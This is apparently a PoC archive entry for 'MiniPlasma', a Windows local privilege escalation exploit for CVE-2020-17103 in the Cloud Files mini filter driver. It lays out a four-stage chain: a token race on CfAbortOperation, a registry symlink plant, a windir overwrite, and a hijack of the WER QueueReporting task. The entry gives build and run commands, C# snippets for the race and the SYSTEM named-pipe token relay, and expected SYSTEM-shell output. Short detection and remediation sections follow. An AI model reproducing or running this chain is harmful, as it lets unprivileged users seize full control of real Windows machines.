PoC Archive

MiniPlasma - Windows Cloud Files Mini Filter Driver LPE (CVE-2020-17103)

by Nightmare-Eclipse, Elliot · 2026-05-15

CVSS:              7.8/10
Severity:          High
CVE:               CVE-2020-17103
Category:          binary
Affected product:  Windows Cloud Files Mini Filter Driver (cldflt.sys) / cldapi.dll
Affected versions: All Windows versions (patch reportedly absent or silently reverted)
Disclosed:         2026-05-15
Patch status:      unpatched

Metadata

Field                 Value
Date Added            2026-05-15
Last Updated          2026-05-16
Author / Researcher   Nightmare-Eclipse, Elliot
CVE / Advisory        CVE-2020-17103
Category              binary
Severity              High
CVSS Score            7.8 (CVSSv3)
Status                Weaponized
Tags                  LPE, Windows, cldflt.sys, Cloud Files API, registry-symlink, race-condition, WER-hijack, SYSTEM-shell, local-user
Related               N/A

Affected Target

Field                     Value
Software / System         Windows Cloud Files Mini Filter Driver (cldflt.sys) / cldapi.dll
Versions Affected         All Windows versions (patch reportedly absent or silently reverted)
Language / Platform       C# / .NET / Windows
Authentication Required   Yes (local code execution as non-admin user)
Network Access Required   Local only

Summary

MiniPlasma is a fully weaponized Windows LPE that exploits a race condition in cldflrt!HsmOsBlockPlaceholderAccess inside cldflt.sys — the same vulnerability originally discovered by James Forshaw (Google Project Zero) and reported as CVE-2020-17103 in 2020. The author found the exact same vulnerable routine is still present and exploitable, either never patched or with the patch silently rolled back.

The exploit chains four stages to deliver a SYSTEM shell in the current user session: race CfAbortOperation to gain an arbitrary registry write primitive → plant a registry symlink redirecting CloudFiles\BlockedApps → overwrite windir in Volatile Environment → hijack the Windows Error Reporting scheduled task (QueueReporting) to execute as SYSTEM via a fake wermgr.exe and named-pipe token relay.


Vulnerability Details

Root Cause

cldflrt!HsmOsBlockPlaceholderAccess in the Cloud Files Mini Filter Driver contains a race condition exploitable via CfAbortOperation with the Block flag. By racing thread impersonation token swaps (switching between anonymous and normal tokens), an unprivileged caller can force the driver to perform a privileged registry write on behalf of the caller — granting an arbitrary-registry-key-write primitive from a low-privilege user process.

Attack Chain (4 Stages)

Stage 0 — Orchestrator
  Role:      Spawns and sequences Stages 1–3
  Technique: Child process management

Stage 1 — Race trigger
  Role:      Wins the CfAbortOperation race to obtain a privileged registry write
  Technique: Token race (anonymous ↔ normal) on a background thread; watches for a registry key sentinel

Stage 2 — Symlink plant
  Role:      Uses the write primitive to delete the BlockedApps contents and plant a registry symlink BlockedApps -> Volatile Environment
  Technique: Registry symbolic link attack

Stage 3 — SYSTEM shell delivery
  Role:      Overwrites windir in Volatile Environment -> drops a fake System32\wermgr.exe -> triggers the QueueReporting task (SYSTEM context) -> named-pipe token relay -> conhost.exe spawned as SYSTEM in the user session
  Technique: Scheduled task abuse + token duplication via named pipe (MiniPlasmaWERPipe)

Impact

Full local privilege escalation to SYSTEM. The exploit reliably spawns an interactive SYSTEM shell in the attacker’s session.


Environment / Lab Setup

OS:       Windows (all versions — patch reportedly absent or reverted)
Target:   Host with Cloud Files components (cldapi.dll / cldflt.sys) present
Attacker: Local non-admin user with execution rights
Tools:    Visual Studio 2019/2022, .NET, NuGet (NtApiDotNet 1.1.33, TaskScheduler 2.12.2)

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Build — restore NuGet dependencies and compile the solution.

    msbuild PoC_AbortHydration_ArbitraryRegKey_EoP.sln /p:Configuration=Release
    
  2. Execute — run as a non-admin local user.

    PoC_AbortHydration_ArbitraryRegKey_EoP.exe
    
  3. Stage progression — the orchestrator sequences Stages 1–3 automatically. On success a SYSTEM shell opens in the user’s session.

Exploit Code

See Program.cs in this folder for the full 4-stage implementation.

// Stage 1 — race CfAbortOperation with thread token swap
Thread raceThread = new Thread(() => {
    while (!raceWon) {
        NtThread.Current.ImpersonateAnonymousToken();
        CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block);
        NtThread.Current.RevertToSelf();
    }
});

// Stage 3 — SYSTEM shell delivery via named pipe token relay
using (var server = new NamedPipeServerStream("MiniPlasmaWERPipe", ...)) {
    server.WaitForConnection();
    // duplicate SYSTEM token, adjust session, spawn conhost.exe as SYSTEM
}

Expected Output

[*] Stage 1: racing CfAbortOperation...
[+] Race won — arbitrary registry write obtained
[*] Stage 2: planting registry symlink BlockedApps -> Volatile Environment
[+] Symlink planted
[*] Stage 3: overwriting windir, triggering QueueReporting task...
[+] SYSTEM process connected on MiniPlasmaWERPipe
[+] Spawning SYSTEM shell — enjoy

Screenshots / Evidence

  • screenshots/ — add authorized lab evidence here

Detection & Indicators of Compromise

SIEM correlation:

low-priv process
  -> repeated cldapi abort calls + token swap
  -> registry ACL change on CloudFiles\BlockedApps
  -> symlink creation (BlockedApps -> Volatile Environment)
  -> windir overwrite in HKU\.DEFAULT\Volatile Environment
  -> wermgr.exe execution from non-system path as SYSTEM

Remediation

Action             Detail
Patch              Monitor Microsoft advisories for a re-issue of the CVE-2020-17103 fix targeting cldflt.sys
Workaround         Disable Windows Cloud Files / OneDrive sync if not required; restrict scheduled task execution (QueueReporting) via AppLocker or WDAC
Config Hardening   Enforce application allowlisting, registry auditing on HKU\.DEFAULT\Software\Policies\Microsoft\CloudFiles, and monitor windir value changes in Volatile Environment

References


Notes

Auto-ingested from https://github.com/Nightmare-Eclipse/MiniPlasma on 2026-05-15. Updated 2026-05-16: researcher overhauled the PoC from a registry-key manipulation demo to a full 4-stage SYSTEM shell exploit. The src/ directory was replaced with the finalized PoC_AbortHydration_ArbitraryRegKey_EoP Visual Studio project. Root cause precisely identified as cldflrt!HsmOsBlockPlaceholderAccess race condition — identical to the 2020 Project Zero finding, reportedly still unpatched. Second contributor: Elliot (uploaded final PoC files). Repository reached 330 stars and 79 forks within 3 days.